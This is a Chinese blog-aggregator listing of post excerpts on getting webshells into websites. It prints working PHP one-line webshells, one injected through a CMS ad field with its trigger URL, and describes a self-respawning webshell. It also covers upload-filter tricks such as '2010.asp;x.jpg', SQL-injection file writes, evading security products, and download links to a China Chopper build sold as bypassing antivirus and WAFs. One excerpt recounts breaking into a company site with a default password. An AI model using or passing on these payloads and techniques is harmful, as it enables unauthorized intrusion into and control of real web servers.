遇到一个被阉割的后台,发现直接传shell显然不行。 然后就有了下文 添加一个新广告。 插入一句话木马: 1 --><?php $_GET[c]($_POST[x]);?><!-- 然后访问: /plus/ad_js.php?aid=42&c=assert aid后面的值是你广告的id。 ...
分类:
系统相关 时间:
2018-05-15 22:37:51
阅读次数:
257
半夜Server2008R2安装MS17-010补丁时,重启系统发现系统密码忘记了还好本地登录的安全策略留了一个guest用户本地搭建了DVWAWEB渗透测试环境权限为system通过漏洞上传过狗一句话木马木马权限为system权限可以创建用户但是无法将用户添加至管理员组估计是安全狗拦截了提权操作随后将管理员权限克隆至login用户登录成功目标将把Guest提权为Administrator查询SA
分类:
其他好文 时间:
2018-05-07 23:50:29
阅读次数:
245
简洁的变形马 利用方式 http://xxx.com/a.php?1=assert&2=phpinfo(); 不死马 使用页面访问这个木马就会疯狂产生不死马,删不死马删不掉,立刻生成,更恶心的是,就算 把制造不死马的木马删了,只要页面没关闭,一样会产生不死马。 ...
分类:
其他好文 时间:
2018-05-05 23:08:24
阅读次数:
310
文件上传getshell一句话木马上传路径可能会帮你改名服务器要能够解析它 #注意bypass代码审计工具看全局配置文件 config.php / common.inc.php审计php脚本首先看源码 在全局配置文件common.inc.php进行全局转移由于全局utf-8的 排除宽字节接下来看up... ...
分类:
其他好文 时间:
2018-04-07 16:18:07
阅读次数:
381
中国菜刀与一句话木马 PHP的一句话木马内容如下: <?php @eval($_POST['chopper']);?> 将这个木马放到“网站”中,打开中国菜刀,在空白处点击鼠标右键,选择“添加”选项。编辑相关参数,包括一句话木马所在的URL及密码,最后点击“编辑”。在URL列表中选中目标网站,点击鼠 ...
分类:
其他好文 时间:
2018-02-23 23:50:12
阅读次数:
376
使用此漏洞需要知道WEB程序的根路径并且MYSQL的secure-file-priv配置应为可写入该路径 添加单引号,发现错误被屏蔽 对应的SQL语句应为 字段还是3个 在数据库中执行测试,看是否能写入成功 修改my.ini 重启MYSQL,测试写入,注意/需要转义 构造GET请求,写入一句话木马 ...
分类:
数据库 时间:
2018-01-19 11:35:43
阅读次数:
692
我们都知道,对于网络渗透最重要的一步是要拿到后台数据库管理员的密码与用户名,那么怎么得到这个用户名和密码呢?就要用到今天所说的Sqlmap,它不仅适用于内网环境,在外网环境也是非常受欢迎的,并且在Kali Linux里边显得尤为重要,它所到之处几乎是“寸草不生”,那么接下来我就简单介绍下Sqlmap ...
分类:
数据库 时间:
2017-09-22 00:55:20
阅读次数:
191
前段时间检测一个企业网站,在检测该企业的一个下属公司的网站时通过用户名admin和密码123456进入了后台,后台目录就是公司汉语拼音+admin,诸如xxxadmin这种形式的。在后台通过“产品图片”上传了一个改名为“2010.asp;x.jpg”的asp一句话木马,顺利得到了webshell,w ...
分类:
其他好文 时间:
2017-08-26 14:21:56
阅读次数:
178
中国菜刀下载,基于原版中国菜刀优化版20160309.下载地址:http://download.csdn.net/detail/settoken/9457567https://pan.baidu.com/s/1jHoJxHWChinachopperhttps://pan.baidu.com/s/1eRxEYjC特别推荐的一个php一句话.菜刀可以连接,过waf,过安全狗,D盾,360,php一句话木马带404页..
分类:
Web程序 时间:
2017-08-25 17:46:14
阅读次数:
382